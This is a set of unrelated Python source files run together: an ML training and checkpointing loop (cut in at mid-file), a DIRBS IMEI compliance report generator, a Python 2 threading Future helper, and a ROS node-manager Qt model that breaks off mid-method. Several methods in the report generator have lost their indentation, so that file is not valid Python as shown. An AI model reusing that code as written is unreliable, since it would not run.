    implement ``fit_dataset`` (whole-epoch fitting) or ``fit_batch``/``fit``
    (per-batch fitting).

    :return: ``(best_performance, best_model_path)``.
    """
    epoch = 0
    best_model_path = None

    # On Ctrl-C, snapshot the current model state before exiting so work
    # is not lost; 'all' keeps the emergency snapshot from being pruned.
    def sigint_handler(signal, frame):
        checkpoint(model, model_checkpoint_format, np.nan, {}, is_best=False, keep_snapshots='all')
        sys.exit(0)
    signal.signal(signal.SIGINT, sigint_handler)
    # Since we call evaluate_model from so many places below, we summarize the common arguments in a dict
    with Monitor(output_dir / 'logs') as monitor:
        eval_kwargs = dict(model=model,
                           evaluation_dataset=evaluation_dataset,
                           model_checkpoint_format=model_checkpoint_format,
                           monitor=monitor,
                           keep_snapshots=training_config.keep_snapshots)
        if training_config.do_pre_eval:
            best_performance, best_model_path = evaluate_model(best_performance=best_performance, epoch=0, **eval_kwargs)
        # These variables will be used to control when to do evaluation
        eval_timestamp = time.time()
        eval_epoch = 0
        eval_iteration = 0
        needs_final_eval = True
        for epoch in trange(training_config.max_epochs, desc='Epochs'):
            if hasattr(model, 'fit_dataset'):
                # The model consumes the whole dataset itself for this epoch.
                model.fit_dataset(training_dataset)
            elif hasattr(model, 'fit_batch') or hasattr(model, 'fit'):
                ## This is the main training loop
                for i, batch in enumerate(tqdm(training_dataset, desc='Training batch')):
                    needs_final_eval = True
                    # Fractional epoch used for logging and checkpoint names.
                    epoch_fraction = epoch + i / len(training_dataset)
                    if hasattr(model, 'fit_batch'):
                        training_results = model.fit_batch(batch)
                    elif hasattr(model, 'fit'):
                        print("Model has 'fit' attribute, we treat it as fit_batch")
                        training_results = model.fit(batch)
                    monitor.log_one_now('epoch', epoch_fraction)
                    if training_results is not None:
                        monitor.log_now(training_results)
                    # eval_time and eval_iterations allow the user to control how often to run evaluations
                    eval_time_dt = time.time() - eval_timestamp
                    eval_iteration += 1
                    if (
                            (training_config.eval_time is not None
                             and training_config.eval_time > 0
                             and eval_time_dt >= training_config.eval_time)
                            or
                            (training_config.eval_iterations is not None
                             and training_config.eval_iterations > 0
                             and eval_iteration >= training_config.eval_iterations)
                    ):
                        best_performance, best_model_path = evaluate_model(best_performance=best_performance, epoch=epoch_fraction, **eval_kwargs)
                        eval_timestamp = time.time()
                        eval_iteration = 0
                        needs_final_eval = False
                    monitor.tick()
            # End of training loop
            eval_epoch += 1
            if (
                    training_config.eval_epochs is not None
                    and training_config.eval_epochs > 0
                    and eval_epoch >= training_config.eval_epochs
            ):
                best_performance, best_model_path = evaluate_model(best_performance=best_performance, epoch=epoch, **eval_kwargs)
                eval_epoch = 0
                needs_final_eval = False
            # End of epoch
        # Done with the whole training loop. If we ran the evaluate_model at the end of the last epoch, we shouldn't do
        # it again
        if needs_final_eval:
            best_performance, best_model_path = evaluate_model(best_performance=best_performance, epoch=epoch, **eval_kwargs)
    return best_performance, best_model_path
def evaluate_model(*,
                   model,
                   evaluation_dataset,
                   best_performance,
                   model_checkpoint_format,
                   epoch,
                   monitor=None,
                   keep_snapshots=False):
    """Evaluate *model*, checkpoint it and update the best-seen performance.

    The model may implement ``evaluate_dataset`` (whole-dataset evaluation)
    or ``evaluate_batch``/``evaluate`` (per-batch; results are averaged with
    ``np.mean``). A checkpoint is always written; when the new performance
    beats *best_performance* the best-model symlink and a
    ``best_performance.csv`` next to the checkpoints are updated as well.

    :return: ``(best_performance, best_model_path)``.
    """
    evaluation_results = {}
    if hasattr(model, 'evaluate_dataset'):
        evaluation_results.update(model.evaluate_dataset(evaluation_dataset))
    elif hasattr(model, 'evaluate_batch') or hasattr(model, 'evaluate'):
        gathered_evaluation_results = defaultdict(list)
        for batch in tqdm(evaluation_dataset, desc='Validation batch'):
            if hasattr(model, 'evaluate_batch'):
                batch_eval_results = model.evaluate_batch(batch)
            elif hasattr(model, 'evaluate'):
                print("Model has 'evaluate' method, we treat it as 'evaluate_batch'")
                batch_eval_results = model.evaluate(batch)
            for k, v in batch_eval_results.items():
                gathered_evaluation_results[k].append(v)
        for k, v in gathered_evaluation_results.items():
            if v:
                try:
                    # Average the per-batch values; non-numeric results are
                    # skipped rather than aborting the evaluation.
                    evaluation_results[k] = np.mean(v)
                except TypeError:
                    print("Not logging result {}, can't aggregate data type".format(k))
    new_performance = best_performance.update(evaluation_results)
    # cmp() decides whether the new results beat the previous best.
    is_best = new_performance.cmp(best_performance)
    if monitor is not None:
        monitor.log_now({k: v for k,v in evaluation_results.items()})
    best_model_path = checkpoint(model, model_checkpoint_format, epoch,
                                 new_performance, is_best, keep_snapshots=keep_snapshots)
    if is_best:
        best_performance = new_performance
        if monitor is not None:
            monitor.log_now({'best_{}'.format(k):v for k,v in best_performance.items()})
        # Persist the best metrics as a one-row CSV next to the checkpoints.
        best_performance_file = model_checkpoint_format.with_name('best_performance.csv')
        with open(best_performance_file, 'w') as fp:
            items = [(k.name, v) for k,v in best_performance.items()]
            keys, vals = zip(*sorted(items))
            fp.write(','.join(str(k) for k in keys) + '\n')
            fp.write(','.join(str(v) for v in vals) + '\n')
    return best_performance, best_model_path
def setup_directory(output_dir: Path):
    """Create *output_dir* (with any missing parents) and point a
    ``latest_experiment`` symlink in its parent directory at it,
    replacing any previous link or file of that name."""
    output_dir.mkdir(parents=True, exist_ok=True)
    link = output_dir.parent / 'latest_experiment'
    # Remove a stale link (is_symlink() also catches dangling links,
    # for which exists() is False).
    if link.is_symlink() or link.exists():
        link.unlink()
    link.symlink_to(output_dir.relative_to(output_dir.parent))
def checkpoint(model,
               checkpoint_format: Path,
               epoch,
               performances,
               is_best,
               latest_model_name='latest_model',
               best_model_name='best_model',
               keep_snapshots: Union[Literal['all', 'none', 'best'], bool] = False):
    """Save a snapshot of *model* and maintain the latest/best symlinks.

    :param checkpoint_format: Path whose name is a format string taking
        ``epoch`` and ``metrics``; the snapshot is written next to it.
    :param performances: metrics object substituted into the file name.
    :param is_best: whether this snapshot becomes the ``best_model`` target.
    :param keep_snapshots: 'all' keeps every snapshot, 'best' keeps only the
        best, 'none' keeps only the current latest/best targets. Booleans map
        to 'all'/'none' for backwards compatibility.
    :return: resolved path of the current best model.
    """
    if isinstance(keep_snapshots, bool):
        if keep_snapshots:
            keep_snapshots = 'all'
        else:
            keep_snapshots = 'none'
    model_directory = checkpoint_format.parent.resolve(strict=False)
    model_name = checkpoint_format.name.format(epoch=epoch, metrics=performances)
    checkpoint_path = checkpoint_format.with_name(model_name).resolve()
    model_directory.mkdir(exist_ok=True)
    # model.save may normalize the path (e.g. add a suffix); trust its return.
    checkpoint_path = model.save(checkpoint_path)
    latest_model_symlink = model_directory / latest_model_name
    best_model_symlink = model_directory / best_model_name
    if keep_snapshots != 'all' and latest_model_symlink.exists():
        # Delete the previous "latest" snapshot unless it is also the current
        # best (in which case the best_model symlink still needs it).
        latest_model = latest_model_symlink.resolve(strict=True)
        if not best_model_symlink.exists() or latest_model != best_model_symlink.resolve(strict=True):
            if latest_model.is_dir():
                shutil.rmtree(latest_model)
            else:
                latest_model.unlink()
    # lexists() is True even for a dangling symlink, which plain exists() misses.
    if os.path.lexists(latest_model_symlink):
        latest_model_symlink.unlink()
    relative_checkpoint = checkpoint_path.relative_to(latest_model_symlink.absolute().parent)
    latest_model_symlink.symlink_to(relative_checkpoint)
    if is_best:
        # Path.exists() on a symlink will return True if what the symlink points to exists, not if the symlink exists
        # To check if the symlink exist, we call is_symlink() as well a exists(), if the path is a symlink, is_symlink()
        # will only return true if it exists, if either returns True, than the file exists and we should remove it
        # whether it's a symlink or not
        if best_model_symlink.exists():
            if keep_snapshots == 'none':
                # The previous best model can't also be the latest model since we take care of that above, so it's safe
                # to remove
                previous_best_model = best_model_symlink.resolve(strict=True)
                if previous_best_model.is_dir():
                    shutil.rmtree(previous_best_model)
                else:
                    previous_best_model.unlink()
        if best_model_symlink.is_symlink():
            best_model_symlink.unlink()
        relative_checkpoint = checkpoint_path.relative_to(best_model_symlink.absolute().parent)
        best_model_symlink.symlink_to(relative_checkpoint)
    return best_model_symlink.resolve()
def setup_training_config(config_path):
    """Load and return a :class:`TrainingConfig` from the file at *config_path*."""
    return load_config(config_path, TrainingConfig)
def add_parser_args(parser):
    """Register the command line arguments shared by the training entry points.

    Mutates *parser* in place and returns nothing.
    """
    parser.add_argument('--output-dir', type=Path,
                        help="Directory to write output to.")
    parser.add_argument('--max-epochs', type=int, default=100,
                        help="Maximum number of epochs to train for.")
    parser.add_argument('--eval-time', type=float,
                        help="How often to run the model on the validation set in seconds.")
    parser.add_argument('--eval-epochs', type=int,
                        help="How often to run the model on the validation set in epochs. 1 means at the end of every epoch.")
    parser.add_argument('--eval-iterations', type=int,
                        help="How often to run the model on the validation set in number of training iterations.")
    parser.add_argument('--do-pre-eval', action='store_true',
                        help="If flag is set, the model will be evaluated once before training starts")
    parser.add_argument('--keep-snapshots', action='store_true',
                        help="If flag is set, all snapshots will be kept. otherwise only the best and the latest are kept.")
if __name__ == '__main__':
    # Smoke test: verify that a default TrainingConfig can be serialized by
    # the same JSON encoder used to write metadata.json.
    conf = TrainingConfig()
    foo = dict(a=1, b=2, c=[1,2,3])
    json_encoder = JSONEncoder(sort_keys=True, indent=4, separators=(',', ': '))
    json_encoder.encode(conf)
reports_generator.py | """
DRS Reports generator package.
Copyright (c) 2018-2020 Qualcomm Technologies, Inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted (subject to the limitations in the disclaimer below) provided that the following conditions are met:
Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
Neither the name of Qualcomm Technologies, Inc. nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
The origin of this software must not be misrepresented; you must not claim that you wrote the original software. If you use this software in a product, an acknowledgment is required by displaying the trademark/log as per the details provided here: https://www.qualcomm.com/documents/dirbs-logo-and-brand-guidelines
Altered source versions must be plainly marked as such, and must not be misrepresented as being the original software.
This notice may not be removed or altered from any source distribution.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import os
from app import session, celery, app
from requests import ConnectionError
from app.api.v1.helpers.error_handlers import *
from app.api.v1.helpers.multisimcheck import MultiSimCheck
from threading import Thread
from math import ceil
import pandas as pd
import uuid
import json
class BulkCommonResources: # pragma: no cover
"""Common resources for bulk request."""
    @staticmethod
    @celery.task
    def get_summary(imeis_list, tracking_id):
        """Celery task for bulk request processing.

        Splits *imeis_list* into thread-sized chunks, fetches per-IMEI
        records from the DIRBS core in parallel and builds the DRS summary
        response for *tracking_id*.
        """
        try:
            imeis_chunks = BulkCommonResources.chunked_data(imeis_list)
            records = BulkCommonResources.start_threads(imeis_list=imeis_chunks)
            # send records for summary generation
            response = BulkCommonResources.build_drs_summary(records, tracking_id)
            return response
        except Exception as e:
            # Bare re-raise: kept so celery records the task as failed.
            raise e
@staticmethod
def chunked_data(imeis_list):
"""Divide IMEIs into batches of 1000 and chunks for multi threading."""
try:
if imeis_list:
imeis_list = list(imeis_list[i:i + 1000] for i in
range(0, len(imeis_list), 1000))
chunksize = int(ceil(len(imeis_list) / 10))
imeis_list = list(imeis_list[i:i + chunksize] for i in range(0, len(imeis_list), chunksize))
return imeis_list
return imeis_list
except Exception as e:
raise e
    @staticmethod
    def start_threads(imeis_list):
        """Process IMEIs simultaneously by starting multiple threads at a time.

        Each element of *imeis_list* is a chunk of IMEI batches handled by
        one thread; batches that fail are retried via :meth:`retry`.
        """
        thread_list = []
        records = []            # shared result list, appended to by the worker threads
        unprocessed_imeis = []  # batches that failed and need retrying
        for imei in imeis_list:
            thread_list.append(Thread(target=BulkCommonResources.get_records, args=(imei, records, unprocessed_imeis)))
        # start threads for all imei chunks
        for x in thread_list:
            x.start()
        # stop all threads on completion
        for t in thread_list:
            t.join()
        if unprocessed_imeis:
            records, unprocessed_imeis = BulkCommonResources.retry(records, unprocessed_imeis)
        return records
    # get records from core system
    @staticmethod
    def get_records(imeis, records, unprocessed_imeis):
        """Compile IMEIs batch responses from DIRBS core system.

        Pops IMEI batches off *imeis* and POSTs each to the core
        ``/imei-batch`` endpoint, extending the shared *records* list with
        the results. Failed batches (non-200 response or connection error)
        are appended to *unprocessed_imeis* for the caller to retry.
        Runs inside a worker thread; *records* and *unprocessed_imeis* are
        shared across threads (list.append/extend only).
        """
        try:
            while imeis:
                imei = imeis.pop(-1)  # pop the last item from queue
                try:
                    if imei:
                        batch_req = {
                            "imeis": imei,
                            "include_registration_status": True,
                            "include_stolen_status": True
                        }
                        headers = {'content-type': 'application/json', 'charset': 'utf-8', 'keep_alive': 'false'}
                        app.logger.info('{}/imei-batch'.format(app.config['CORE_BASE_URL']+app.config['API_VERSION']))
                        imei_response = session.post('{}/imei-batch'.format(app.config['CORE_BASE_URL']+app.config['API_VERSION']),
                                                     data=json.dumps(batch_req),
                                                     headers=headers)  # dirbs core batch api call
                        if imei_response.status_code == 200:
                            imei_response = imei_response.json()
                            records.extend(imei_response['results'])
                        else:
                            app.logger.info("imei batch failed due to status other than 200")
                            unprocessed_imeis.append(imei)  # in case of connection error append imei count to unprocessed IMEIs list
                    else:
                        continue
                except (ConnectionError, Exception) as e:
                    # Any failure queues the batch for retry rather than aborting the thread.
                    unprocessed_imeis.append(imei)  # in case of connection error append imei count to unprocessed IMEIs list
                    app.logger.exception(e)
        except Exception as error:
            raise error
    @staticmethod
    def retry(records, unprocessed_imeis):
        """Retry failed IMEI batches.

        Re-chunks the failed batches and re-runs :meth:`get_records` in
        threads, up to 10 times or until nothing is left unprocessed.

        :return: ``(records, unprocessed_imeis)`` — accumulated results and
            any batches that still failed after all retries.
        """
        retry = 10
        while retry and len(unprocessed_imeis) > 0:
            threads = []
            retry = retry - 1
            imeis_list = unprocessed_imeis
            unprocessed_imeis = []
            chunksize = int(ceil(len(imeis_list) / 10))
            imeis_list = list(imeis_list[i:i + chunksize] for i in
                              range(0, len(imeis_list), chunksize))  # make 100 chunks for 1 million imeis
            for imeis in imeis_list:
                threads.append(Thread(target=BulkCommonResources.get_records, args=(imeis, records, unprocessed_imeis)))
            for x in threads:
                x.start()
            for t in threads:
                t.join()
        return records, unprocessed_imeis
    @staticmethod
    def build_drs_summary(records, tracking_id):
        """Generate summary for DRS bulk records.

        Aggregates the per-IMEI records returned by the DIRBS core into
        counts (stolen, seen on network, per condition, compliance buckets)
        and returns them together with the compliant-report file name.
        Returns an empty dict-shaped response when *records* is empty.
        """
        try:
            response = {}
            if records:
                result = pd.DataFrame(records)  # main dataframe for results
                stolen_list = pd.DataFrame(list(result['stolen_status']))  # dataframe for stolen status
                # provisional_only: True = stolen report pending, False = confirmed stolen
                pending_stolen_count = len(stolen_list.loc[stolen_list['provisional_only']==True])
                stolen = len(stolen_list.loc[stolen_list['provisional_only']==False])
                count_per_condition = {}
                realtime = pd.DataFrame(list(result['realtime_checks']))  # dataframe of realtime checks
                seen_on_network = len(realtime.loc[realtime['ever_observed_on_network']==True])
                blocking_condition = pd.DataFrame(i['blocking_conditions'] for i in result['classification_state'] if i['blocking_conditions'])  # dataframe for blocking conditions
                info_condition = pd.DataFrame(i['informative_conditions'] for i in result['classification_state'] if i['informative_conditions'])  # dataframe for informative conditions
                # IMEI count per blocking condition
                count_per_condition, block = BulkCommonResources.count_condition(count=count_per_condition, conditions=blocking_condition)
                # IMEI count per informative condition
                count_per_condition, info = BulkCommonResources.count_condition(count=count_per_condition, conditions=info_condition)
                # processing compliant status for all IMEIs
                data = BulkCommonResources.generate_drs_compliant_report(records, tracking_id)
                # summary for bulk verify IMEI
                response['provisional_stolen'] = pending_stolen_count
                response['verified_imei'] = len(records)
                response['count_per_condition'] = count_per_condition
                response['non_compliant'] = data['non_compliant']
                response['compliant'] = data['compliant']
                response['compliant_active'] = data['compliant_active']
                response['provisional_non_compliant'] = data['provisionally_non_compliant']
                response['provisional_compliant'] = data['provisionally_compliant']
                response['seen_on_network'] = seen_on_network
                response['stolen'] = stolen
                response['compliant_report_name'] = data['filename']
                response['id'] = tracking_id
            return response
        except Exception as e:
            raise e
    # generate compliant report and count non compliant IMEIs
    @staticmethod
    def generate_drs_compliant_report(records, tracking_id):
        """Return non compliant report for DRS bulk request.

        Classifies every record into a compliance bucket, writes two TSV
        reports (full + user-restricted copy without internal columns) under
        the tracking directory, and returns the bucket counts and file names.
        """
        non_compliant = 0
        compliant = 0
        active_compliant = 0
        provisionally_compliant = 0
        provisionally_non_compliant = 0
        complaint_report = []
        for key in records:
            status = BulkCommonResources.compliance_status(resp=key, status_type="bulk", imei=key['imei_norm'])
            # provisional_only: True = pending, None = not stolen, False = confirmed stolen
            status['stolen_status'] = "Pending Stolen Verification" if key['stolen_status']['provisional_only'] \
                else "Not Stolen" if key['stolen_status']['provisional_only'] is None else "Stolen"
            status['seen_on_network'] = key['realtime_checks']['ever_observed_on_network']
            if "Provisionally Compliant" in status['status']:
                provisionally_compliant += 1
            elif "Provisionally non compliant" in status['status']:
                provisionally_non_compliant += 1
            elif status['status'] == "Compliant (Inactive)":
                compliant += 1
            elif status['status'] == "Compliant (Active)":
                active_compliant += 1
            elif status['status'] == "Non compliant":
                non_compliant += 1
            complaint_report.append(status)
        complaint_report = pd.DataFrame(complaint_report)  # dataframe of compliant report
        report_name = 'compliant_report' + str(uuid.uuid4()) + '.tsv'
        report_path = os.path.join(app.config['DRS_UPLOADS'], '{0}'.format(tracking_id))
        complaint_report.to_csv(os.path.join(report_path, report_name), sep='\t')
        # The user-facing copy drops internal columns.
        del_columns = ['block_date', 'seen_on_network', 'stolen_status']
        restricted_report = complaint_report.drop(del_columns, axis=1, errors='ignore')
        user_report_name = 'user_report-{}'.format(report_name)
        restricted_report.to_csv(os.path.join(report_path, user_report_name), sep='\t')
        data = {
            "non_compliant": non_compliant,
            "compliant": compliant,
            "compliant_active": active_compliant,
            "provisionally_non_compliant": provisionally_non_compliant,
            "provisionally_compliant": provisionally_compliant,
            "filename": report_name,
            "user_report_name": user_report_name,
        }
        return data
    # count per condition classification state
    @staticmethod
    def count_condition(conditions, count):
        """Helper functions to generate summary, returns IMEI count per condition.

        *conditions* is a dataframe whose cells are condition dicts
        (``condition_name``/``condition_met``); *count* is updated in place
        with, for each condition name, the number of IMEIs that met it.

        :return: ``(count, condition)`` — the updated counts and the
            name-keyed boolean dataframe built along the way.
        """
        condition = []
        transponsed = conditions.transpose()
        for c in transponsed:
            cond = {}
            for i in transponsed[c]:
                cond[i['condition_name']] = i['condition_met']  # serialize conditions in list of dictionaries
            condition.append(cond)
        condition = pd.DataFrame(condition)
        for key in condition:  # iterate over list
            count[key] = len(condition[condition[key]])  # count meeting conditions
        return count, condition
    @staticmethod
    def compliance_status(resp, status_type, imei=None):
        """Evaluate IMEIs to be compliant/non complaint.

        Derives a status dict from the core response *resp* using the
        registration, stolen and realtime check fields. The first matching
        rule wins: registration pending > registered > stolen pending >
        stolen > fully clean > non compliant. ``status_type`` controls the
        returned shape (see :meth:`populate_status`).
        """
        try:
            status = {}
            seen_with = resp['realtime_checks']['ever_observed_on_network']
            blocking_conditions = resp['classification_state']['blocking_conditions']
            # provisional_only: True = request pending, None = no record, False = confirmed
            stolen_status = resp['stolen_status']['provisional_only']
            reg_status = resp['registration_status']['provisional_only']
            block_date = resp.get('block_date', 'N/A')
            gsma_not_valid = resp['realtime_checks']['gsma_not_found']
            in_registration_list = resp['realtime_checks']['in_registration_list']
            invalid_imei = resp['realtime_checks']['invalid_imei']
            if reg_status:  # provisionally non - compliant as registration pending
                status = BulkCommonResources.populate_status(status, 'Provisionally Compliant', status_type,
                                                             blocking_conditions,
                                                             ['Device already applied for registration'], imei=imei)
            elif not reg_status and in_registration_list:
                status = BulkCommonResources.populate_status(status, 'Compliant', status_type,
                                                             blocking_conditions,
                                                             ['Device already registered in DIRBS/DRS'], imei=imei,
                                                             seen_with=seen_with)
            elif stolen_status:  # non - compliant as stolen
                status = BulkCommonResources.populate_status(status, 'Provisionally Non compliant', status_type,
                                                             blocking_conditions,
                                                             ['Device is reported stolen and is pending'], imei=imei,
                                                             block_date=block_date)
            elif stolen_status is not None:
                # provisional_only is False here: confirmed stolen.
                status = BulkCommonResources.populate_status(status, 'Non compliant', status_type,
                                                             blocking_conditions,
                                                             ['Device is reported stolen'],
                                                             imei=imei,
                                                             block_date=block_date)
            elif not gsma_not_valid and not in_registration_list and block_date is None and not seen_with and \
                    not invalid_imei:
                # Compliant Device
                status = BulkCommonResources.populate_status(status, 'Compliant', status_type, imei=imei, seen_with=seen_with)
            else:
                status = BulkCommonResources.populate_status(status, 'Non compliant', status_type, blocking_conditions,
                                                             ['Device is non compliant check blocking conditions if '
                                                              'not found it may be invalid IMEI'],
                                                             imei=imei,
                                                             block_date=block_date)
            return status
        except Exception as error:
            raise error
    @staticmethod
    def populate_status(resp, status, status_type, blocking_condition=None, reason_list=None, imei=None, block_date=None, seen_with=None):
        """Return compliant status of an IMEI.

        Fills *resp* with the IMEI, a status string and (for non-compliant
        devices) the block date and inactivity reasons. For
        ``status_type == "bulk"`` the flat dict is returned; otherwise it is
        wrapped as ``{"compliant": resp}``.
        """
        try:
            resp['imei'] = imei
            if status == 'Compliant' or status == 'Provisionally Compliant':
                # Suffix reflects whether the IMEI was ever seen on the network.
                if seen_with:
                    resp['status'] = status + ' (Active)'
                else:
                    resp['status'] = status + ' (Inactive)'
                if status_type == "bulk":
                    return resp
                else:
                    return {"compliant": resp}
            else:
                resp['status'] = status
                resp['block_date'] = block_date
                if status_type == "basic":
                    resp['inactivity_reasons'] = BulkCommonResources.populate_reasons(blocking_condition, reason_list)
                elif status_type == "bulk":
                    resp['inactivity_reasons'] = BulkCommonResources.populate_reasons(blocking_condition, reason_list)
                    return resp
                # NOTE(review): only the "basic" (or unknown) status_type reaches
                # this point; the flat dict is wrapped like the compliant path —
                # confirm this asymmetry with the API callers.
                return {"compliant": resp}
        except Exception as error:
            raise error
@staticmethod
def populate_reasons(blocking, reasons_list):
"""Return reasons for IMEI to be non compliant."""
try:
voilating_conditions = [key['condition_name'] for key in blocking if key['condition_met']]
for condition in app.config['conditions']:
if condition['name'] in voilating_conditions:
reasons_list.append(condition['reason'])
return reasons_list
except Exception as error:
raise error
# count IMEIs meeting no condition
@staticmethod
def no_condition_count(all_conditions):
"""Helper functions to generate summary, returns count of IMEI satisfying no conditions."""
no_conditions = 0
for key in all_conditions:
if (~all_conditions[key]).all():
no_conditions += 1
return no_conditions
|
async.py | #!/usr/bin/env python
# encoding: utf-8
"""
async.py - functions for asyncrounous code
Created by Maximillian Dornseif on 2009-02-15.
Copyright (c) 2009 HUDORA. All rights reserved.
parts based on http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/84317
"""
import copy
import logging
import sys
import threading
import time
class Future:
    """This calls a function in a separate thread and returns a function waiting for that thread to finish.

    Typical use:
    tagfuture = Future(get_slow_tagcount, 'parameter') # starts a separate thread
    ... do something else ...
    tagcount = tagfuture() # waits for thread to finish and returns result

    NOTE(review): Python 2 only — the three-expression ``raise`` in
    ``__call__`` is a SyntaxError on Python 3.
    """

    def __init__(self, func, *args, **kwargs):
        # Constructor
        self.__done = False               # set True by Wrapper when func has finished
        self.__result = None              # func's return value (or error marker string)
        self.__status = 'working'         # shown in __repr__
        self.__excpt = None               # sys.exc_info() triple if func raised
        self.__namecache = func.__name__  # cached for the slow-wait log message
        self.__Cond = threading.Condition() # Notify on this Condition when result is ready
        # Run the actual function in a separate thread
        self.__Thread = threading.Thread(target=self.Wrapper, args=((func, ) + args), **kwargs)
        self.__Thread.setName("FutureThread")
        self.__Thread.start()

    def __repr__(self):
        return '<Future at ' + hex(id(self)) + ':' + self.__status + '>'

    def __call__(self):
        # Block until the worker thread signals completion.
        waitstart = time.time()
        self.__Cond.acquire()
        while self.__done is False:
            self.__Cond.wait()
        self.__Cond.release()
        # We deepcopy __result to prevent accidental tampering with it.
        ret = copy.deepcopy(self.__result)
        if self.__excpt:
            # Re-raise the worker's exception with its original traceback
            # in the caller's thread (Python 2 raise syntax).
            raise self.__excpt[0], self.__excpt[1], self.__excpt[2]
        waitend = time.time()
        if waitend - waitstart > 1:
            logging.debug("waited %.1f s for %s", waitend - waitstart, self.__namecache)
        return ret

    def Wrapper(self, func, *args, **kwargs):
        # Run the actual function, and let us housekeep around it
        self.__Cond.acquire()
        try:
            self.__result = func(*args, **kwargs)
        except:
            # Capture the full exc_info so __call__ can re-raise it later.
            self.__result = "Exception raised within Future"
            self.__excpt = sys.exc_info()
        self.__done = True
        self.__Cond.notify()
        self.__Cond.release()
|
master_list_model.py | # Software License Agreement (BSD License)
#
# Copyright (c) 2012, Fraunhofer FKIE/US, Alexander Tiderko
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Fraunhofer nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import sys
from python_qt_binding.QtCore import QObject, QRect, Qt, Signal
from python_qt_binding.QtGui import QIcon, QImage, QStandardItem, QStandardItemModel
try:
from python_qt_binding.QtGui import QItemDelegate, QPushButton, QStyle
except Exception:
from python_qt_binding.QtWidgets import QItemDelegate, QPushButton, QStyle
from socket import getaddrinfo, AF_INET6
import threading
from fkie_master_discovery.master_discovery import DiscoveredMaster
from fkie_master_discovery.common import get_hostname
from fkie_node_manager_daemon.common import isstring
import fkie_node_manager as nm
class MasterSyncButtonHelper(QObject):
    '''
    This is helper class to which contains a button and can emit signals. The
    MasterSyncItem can not emit signals, but is used in QStandardModel.
    '''

    clicked = Signal(bool, str)

    NOT_SYNC = 0
    SWITCHED = 1
    SYNC = 2

    ICON_PREFIX = 'irondevil'
#    ICON_PREFIX = 'crystal_clear'

    def __init__(self, master):
        QObject.__init__(self)
        self.name = master.name
        self._master = master
        self._syncronized = MasterSyncButtonHelper.NOT_SYNC
        self.ICONS = {MasterSyncButtonHelper.SYNC: nm.settings().icon("%s_sync.png" % self.ICON_PREFIX),
                      MasterSyncButtonHelper.NOT_SYNC: nm.settings().icon("%s_not_sync.png" % self.ICON_PREFIX),
                      MasterSyncButtonHelper.SWITCHED: nm.settings().icon("%s_start_sync.png" % self.ICON_PREFIX)}
        self.widget = QPushButton()
#        self.widget.setFlat(True)
        self.widget.setIcon(self.ICONS[MasterSyncButtonHelper.NOT_SYNC])
        self.widget.setMaximumSize(48, 48)
        self.widget.setCheckable(True)
        self.widget.clicked.connect(self.on_sync_clicked)

    def on_sync_clicked(self, checked):
        # Show the transitional icon until the sync result comes back.
        self.set_sync_state(MasterSyncButtonHelper.SWITCHED)
        self.clicked.emit(checked, self._master.uri)

    def master(self):
        return self._master

    def get_sync_state(self):
        return self._syncronized

    def set_sync_state(self, value):
        if self._syncronized != value:
            self._syncronized = value
            if value in self.ICONS:
                self.widget.setIcon(self.ICONS[value])
                self.widget.setChecked(value == MasterSyncButtonHelper.SYNC)

    def __eq__(self, item):
        # BUG FIX: ``master`` is a plain method on this class (not a property),
        # so the original ``self.master.name`` raised AttributeError on a bound
        # method. Compare the cached master name instead; ``item.name`` works
        # for both MasterSyncButtonHelper and MasterSyncItem counterparts.
        if isstring(item):
            return self.name.lower() == item.lower()
        elif item is not None:
            return self.name.lower() == item.name.lower()
        return False

    def __gt__(self, item):
        if isstring(item):
            return self.name.lower() > item.lower()
        elif item is not None:
